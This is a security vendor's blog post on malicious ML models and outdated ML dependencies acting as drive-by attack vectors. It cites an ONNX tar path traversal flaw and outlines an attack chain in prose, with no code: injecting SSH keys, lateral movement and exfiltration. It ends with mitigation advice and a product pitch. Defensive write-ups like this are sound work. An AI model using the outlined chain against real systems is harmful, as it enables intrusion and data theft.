Machine Learning Models: A New Attack Vector for an Old Exploit

Written by Adam Nygate | Apr 16, 2025 3:53:51 PM

Machine learning (ML) has seen rapid adoption across industries, enabling advancements in automation, analytics, and artificial intelligence. However, the rapid growth of ML has also introduced new security concerns. One particularly alarming issue is the way ML models are becoming an attack vector for a familiar but seemingly outdated exploit: drive-by attacks. In the era of Java and Flash vulnerabilities, drive-by attacks were a common way to compromise systems, often requiring nothing more than a visit to a malicious website to unknowingly trigger an exploit. Now, the same approach is making a resurgence through ML dependencies and models.

The Wild West of ML Dependency Management

Unlike traditional software development, ML dependency management operates in a chaotic and loosely controlled ecosystem. ML engineers frequently download vast amounts of dependencies for their development environments, often pulling in extensive packages and libraries as part of experimentation, without carefully scoping them to specific projects. The focus on experimentation and speed often leads to:

Dependencies being downloaded in bulk for convenience
Minimal project-by-project dependency scoping
Ad-hoc updates that only occur when absolutely necessary

This creates a perfect storm of unmonitored and out-of-date libraries, many of which contain vulnerabilities that are rarely scrutinized because they are seen as dependencies used for experimentation and development and are not held to the same standard as production dependencies.

Vulnerable Dependencies: A Silent Threat

Many ML dependencies, especially those recognized as development libraries, contain vulnerabilities capable of Arbitrary Code Execution (ACE). Traditionally, these vulnerabilities posed a limited threat unless an application's code explicitly invoked the affected functions. As a result, most security measures focus on Source Composition Analysis (SCA) to scan applications consuming these dependencies. However, the ML ecosystem challenges this traditional model.

The Rise of ML-Based Drive-By Exploits

One of the most concerning aspects of this attack vector is that victims would rarely, if ever, realize that a model or a Hugging Face repository contains a malicious payload. Attackers can embed payloads in various components such as model files, weights, configuration files, binary files, and Python scripts. Loading a compromised model is as simple as downloading a file and calling the library’s .load() method. Many libraries even allow entire repositories to be loaded with a single command. Given that payloads can be obfuscated within model files, manually identifying vulnerabilities is nearly impossible, making this an especially insidious form of attack.

A real-world example of this was discovered by a huntr security researcher, highlighting the risks posed by malicious models. The vulnerability exists in the download_model_with_test_data function, which does not adequately prevent malicious tar files from performing path traversal attacks. This allows attackers to overwrite any file on the system, impacting integrity and availability, with potential consequences such as:

Privileged System Access: Attackers could inject their own public RSA key into the authorized_keys file, leading to remote access and code execution.
Data Integrity Manipulation: Attackers could tamper with or poison ML training datasets, leading to compromised model outputs, biased predictions, or backdoor access to manipulate decision making systems.
Lateral Movement: Once an attacker compromises an ML engineer’s environment, they can move laterally to access infrastructure, steal credentials, and escalate privileges, potentially compromising cloud environments and exfiltrating sensitive data.

This vulnerability, present in the ONNX framework, is easily importable, making it a significant risk when dealing with unverified ML models. The increasing consumption of third-party ML models, combined with the lack of strict dependency management, exacerbates this risk. Attackers can exploit this in a new type of attack chain:

An attacker creates a malicious ML model embedded with an exploit targeting a known vulnerability in an outdated ML library.
The compromised model is shared via a public repository or a collaborative ML workspace.
An unsuspecting ML engineer downloads and loads the model, triggering the exploit within their local development environment.
The attacker gains control over the compromised system, allowing for data exfiltration, lateral movement, and further exploitation. This risk is amplified by the fact that ML developers often have privileged access to sensitive data, including intellectual property and private user information, increasing the potential impact of such attacks through data theft and privacy breaches.

This mirrors the drive-by download attacks of the past, where visiting a malicious website with an outdated version of Java or Flash could silently compromise a workstation.

Mitigating the Threat

To defend against this new attack vector, organizations and ML engineers must adopt stronger security practices in dependency management and model verification:

Strict Dependency Management: Implement rigorous dependency scoping on a project-by-project basis.
Zero Trust for ML Models: Just as software binaries undergo thorough security checks, ML models should be treated with similar scrutiny before usage. Protect AI Guardian scans both first- and third-party models for threats, blocking unsafe models from usage by ML teams.
Dependency Security Scanning: Traditional SCA tools are not equipped to scan dependencies holistically. Protect AI is exploring solutions in this space, and we encourage security-conscious teams to engage with us to address this growing threat.

Conclusion

The parallels between ML-based drive-by attacks and the notorious Java/Flash drive-bys highlight a critical blind spot in modern cybersecurity. As ML continues to evolve, so too must the security practices surrounding it. Recognizing ML models as potential attack vectors and strengthening dependency security measures will be essential in mitigating these threats before they escalate into widespread exploitation. The past has already shown us what happens when we ignore the risks of unmanaged dependencies—now, it's time to apply those lessons to the ML landscape.

Protect AI is ready to assist in tackling these risks. Get in touch to explore existing and future solutions designed to safeguard ML environments against emerging threats.

View full post